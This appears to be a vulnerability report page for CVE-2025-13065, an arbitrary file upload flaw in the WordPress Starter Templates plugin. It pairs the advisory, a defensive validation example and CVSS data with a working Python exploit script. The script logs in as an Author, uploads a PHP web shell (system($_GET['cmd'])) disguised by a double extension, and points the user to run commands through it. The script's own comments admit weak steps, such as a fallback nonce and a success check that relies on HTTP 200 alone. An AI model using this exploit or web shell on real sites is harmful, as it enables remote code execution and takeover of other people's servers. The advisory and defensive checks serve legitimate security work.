Security Vulnerability Report
CVE-2025-13065 CVSS 8.8 HIGH

CVE-2025-13065

Published: 2025-12-06 10:16:05
Last Modified: 2026-04-15 00:35:42

Description

The Starter Templates plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 4.4.41. The cause is insufficient file type validation when detecting WXR (WordPress eXtended RSS) import files: a file carrying a double extension bypasses sanitization while still being accepted as a valid WXR file (CWE-434, unrestricted upload of a file with dangerous type). This makes it possible for authenticated attackers with Author-level access and above to upload arbitrary files to the affected site's server, which may make remote code execution possible. The fix shipped in version 4.4.42, in the changeset to inc/lib/starter-templates-importer/importer/wxr-importer/st-wxr-importer.php cited in the NVD record.
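The following is an added illustration, not code from the Starter Templates plugin and not part of the NVD record. The advisory only states that a double-extension file is accepted as WXR while sanitization is bypassed; the shape of the weak check (`loose_is_wxr`, a substring match on `.wxr`), the hardened check (`strict_is_wxr`), the triage helper (`flag_suspicious_uploads`) and all sample file names and contents are assumptions constructed for the example. The hardened check judges only the final extension, refuses executable extensions anywhere in the name, and requires the body to parse as RSS carrying the WXR namespace.

```python
"""Added example: weak vs. strict WXR file-type validation (CWE-434 double extension)."""
import os
import re
import xml.etree.ElementTree as ET

WXR_NS = "http://wordpress.org/export/1.2/"
# Extensions a PHP-backed web server may execute if they land under wp-content/uploads/.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar", "pht", "phps"}


def loose_is_wxr(filename: str) -> bool:
    """Assumed weak check: answers 'is this a WXR file?' by substring matching,
    so 'export.wxr.php' and 'shell.php.wxr' both sail through."""
    return ".wxr" in filename.lower()


def strict_is_wxr(filename: str, data: bytes) -> bool:
    """Accept only if the *final* extension is .wxr, no other dotted segment is an
    executable extension, and the body is an RSS document with WXR markup."""
    name = os.path.basename(filename)            # ignore any path component
    if not re.fullmatch(r"[A-Za-z0-9_-]+(?:\.[A-Za-z0-9]+)*", name):
        return False                              # odd characters, trailing dots, empty name
    parts = name.lower().split(".")
    if len(parts) < 2 or parts[-1] != "wxr":
        return False                              # judge the last extension only
    if any(p in EXECUTABLE_EXTS for p in parts[:-1]):
        return False                              # 'shell.php.wxr' is never a legitimate export
    try:
        # expat does not fetch external entities, so parsing untrusted XML here is safe;
        # callers should still cap the upload size before reaching this point.
        root = ET.fromstring(data)
    except ET.ParseError:
        return False
    if root.tag != "rss":
        return False
    channel = root.find("channel")
    if channel is None:
        return False
    # A real WXR export declares its version in the wp: namespace.
    return channel.find(f"{{{WXR_NS}}}wxr_version") is not None


def flag_suspicious_uploads(paths):
    """Triage aid for responders: files under an uploads tree whose name carries an
    executable extension in any dotted segment (what a successful bypass leaves behind)."""
    hits = []
    for p in paths:
        segs = os.path.basename(p).lower().split(".")[1:]
        if any(s in EXECUTABLE_EXTS for s in segs):
            hits.append(p)
    return hits


# Constructed samples (not real exports, not the PoC payload):
VALID_WXR = b"""<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:wp="http://wordpress.org/export/1.2/">
  <channel>
    <title>Demo Site</title>
    <wp:wxr_version>1.2</wp:wxr_version>
    <item><title>Hello</title></item>
  </channel>
</rss>"""

PHP_PAYLOAD = b"<?php system($_GET['cmd']); ?>"

SAMPLES = [
    ("site-export.wxr", VALID_WXR),        # legitimate export
    ("site-export.wxr.php", VALID_WXR),    # double extension, executable last
    ("shell.php.wxr", PHP_PAYLOAD),        # double extension, PHP body
    ("not-really.wxr", PHP_PAYLOAD),       # right name, wrong content
]


def evaluate(samples=SAMPLES):
    """Return {filename: (loose_result, strict_result)} for each sample."""
    return {name: (loose_is_wxr(name), strict_is_wxr(name, data)) for name, data in samples}


if __name__ == "__main__":
    for name, (loose, strict) in evaluate().items():
        print(f"{name:24} loose={loose!s:5} strict={strict}")
    print("suspicious:", flag_suspicious_uploads(
        ["wp-content/uploads/2025/12/site-export.wxr.php",
         "wp-content/uploads/2025/12/image.jpg"]))
```

The weak check accepts all four samples; the strict one accepts only the genuine export. Extension checks alone are not enough either way: the content check is what catches a correctly named file with a PHP body, and keeping executable extensions out of the uploads tree (or denying PHP execution there at the web server) is the defence in depth that blunts this class of bug.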

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

Starter Templates (Astra Sites) for WordPress, all versions up to and including 4.4.41; fixed in 4.4.42. The NVD record carries no CPE configuration data (vulnStatus: Deferred), so the affected range above is taken from the advisory text and the 4.4.42 changeset reference.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-13065 PoC - WordPress Starter Templates Arbitrary File Upload
Author: Security Researcher
Note: This PoC is for educational and authorized testing purposes only.
"""
import re
import sys

import requests


def create_malicious_file():
    """
    Build the upload payload: WXR-looking XML that embeds PHP, saved under a
    double extension so the plugin's WXR detection still accepts it while
    the extension-based sanitization is bypassed.
    """
    php_code = '''<?php
// Minimal command-execution shell
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>'''

    # Double extension used to bypass the .wxr check
    filename = "malicious.php.jpg"

    # WXR file content with embedded PHP (content: prefix declared so the XML is well-formed)
    wxr_content = f'''<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
     xmlns:wp="http://wordpress.org/export/1.2/"
     xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Malicious Import</title>
    <item>
      <content:encoded><![CDATA[{php_code}]]></content:encoded>
    </item>
  </channel>
</rss>'''
    return filename, wxr_content.encode()


def exploit(target_url, username, password):
    """
    Exploit the arbitrary file upload vulnerability as an Author-level
    (or higher) user.
    """
    session = requests.Session()

    # Step 1: Login to WordPress
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1',
    }
    print("[*] Attempting to login to WordPress...")
    session.post(login_url, data=login_data, allow_redirects=True, timeout=30)

    # WordPress only sets a wordpress_logged_in_* cookie on a successful login
    if not any(c.name.startswith('wordpress_logged_in') for c in session.cookies):
        print("[-] Login failed! Please check credentials.")
        return False
    print("[+] Login successful!")

    # Step 2: Get nonce for importer
    nonce_url = f"{target_url}/wp-admin/admin.php?page=starter-templates"
    response = session.get(nonce_url, timeout=30)

    # Extract nonce (simplified)
    nonce_match = re.search(r'name="_wpnonce" value="([a-z0-9]+)"', response.text)
    if not nonce_match:
        # A wrong nonce will be rejected by the plugin's referer check
        print("[-] Could not find nonce, trying alternative method...")
        nonce = "fallback_nonce"
    else:
        nonce = nonce_match.group(1)

    # Step 3: Upload malicious file
    upload_url = f"{target_url}/wp-admin/admin-ajax.php"
    filename, file_content = create_malicious_file()
    files = {
        'file': (filename, file_content, 'application/octet-stream'),
    }
    data = {
        'action': 'st_import_site',
        '_wpnonce': nonce,
        'starter-templates-import': '1',
    }
    print(f"[*] Uploading malicious file: {filename}")
    response = session.post(upload_url, data=data, files=files, timeout=60)

    # admin-ajax.php answers 200 for many failures too; confirm the file actually landed
    if response.status_code == 200:
        print("[+] File upload request sent!")
        print(f"[*] Check {target_url}/wp-content/uploads/ for the uploaded file")
        print("[*] Access the file directly to execute commands: ?cmd=whoami")
        return True

    print("[-] Upload failed!")
    return False


if __name__ == "__main__":
    # Three positional arguments are required
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-13065.py <target_url> <username> <password>")
        print("Example: python cve-2025-13065.py http://target.com admin password")
        sys.exit(1)
    target = sys.argv[1].rstrip('/')
    user = sys.argv[2]
    pwd = sys.argv[3]
    exploit(target, user, pwd)

References

https://plugins.trac.wordpress.org/changeset/3395498/astra-sites/tags/4.4.42/inc/lib/starter-templates-importer/importer/wxr-importer/st-wxr-importer.php (fix changeset, version 4.4.42)
https://www.wordfence.com/threat-intel/vulnerabilities/id/439e4c99-8f34-4e66-9d86-c0cbb8cf6da0?source=cve (Wordfence advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13065", "sourceIdentifier": "[email protected]", "published": "2025-12-06T10:16:05.090", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Starter Templates plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 4.4.41. This is due to insufficient file type validation detecting WXR files, allowing double extension files to bypass sanitization while being accepted as a valid WXR file. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3395498/astra-sites/tags/4.4.42/inc/lib/starter-templates-importer/importer/wxr-importer/st-wxr-importer.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/439e4c99-8f34-4e66-9d86-c0cbb8cf6da0?source=cve", "source": "[email protected]"}]}}